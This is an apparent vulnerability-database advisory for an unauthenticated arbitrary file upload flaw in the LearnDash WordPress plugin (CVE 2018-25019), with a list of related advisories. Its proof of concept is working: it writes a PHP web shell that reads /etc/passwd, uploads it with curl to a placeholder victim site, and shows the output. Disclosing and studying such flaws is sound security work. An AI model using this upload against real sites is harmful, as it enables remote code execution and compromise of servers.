LearnDash < 2.5.4 – Unauthenticated Arbitrary File Upload | CVE 2018-25019 | Plugin Vulnerabilities

Description

The plugin does not have any authorisation and validation of the file to be uploaded in the learndash_assignment_process_init() function, which could allow unauthenticated users to upload arbitrary files to the web server

Proof of Concept

$ echo '<?php echo exec("ls -la /etc/passwd");' > shell.php.php

$ curl -F "post=foobar" -F "course_id=foobar" -F "uploadfile=foobar" -F 
"uploadfiles[]=@...hell.php.php" https://victim.tld/

$ curl 'https://victim.tld/wp-content/uploads/assignments/shell.php.'
-rw-r--r-- 1 root root 2385 Apr 14  2017 /etc/passwd

Affects Plugins

Fixed in 2.5.4

References

CVE

URL

https://lists.openwall.net/full-disclosure/2018/01/10/17

Miscellaneous

Original Researcher

Jerome Bruandet (NinTechNet)

Verified

Yes

WPVDB ID

9444f67b-8e3d-4cf0-b319-ed25e7db383a

Timeline

Publicly Published

2018-01-06 (about 6 years ago)

Added

2021-10-20 (about 2 years ago)

Last Updated

2022-04-14 (about 2 years ago)

Other

Published

Title

Published

2014-08-01

Title

spamtask - ofc_upload_image.php Arbitrary File Upload

Published

2024-01-18

Title

AI Engine < 2.1.5 - Editor+ Arbitrary File Upload via add_image_from_url

Published

2020-11-13

Title

[0day] AIT CSV Import / Export <= 3.0.3 - Unauthenticated Arbitrary File Upload

Published

2023-12-27

Title

WP Mail Log Plugin < 1.1.3 - Contributor+ Arbitrary File Upload

Published

2014-08-01

Title

Pica Photo Gallery - Arbitrary File Upload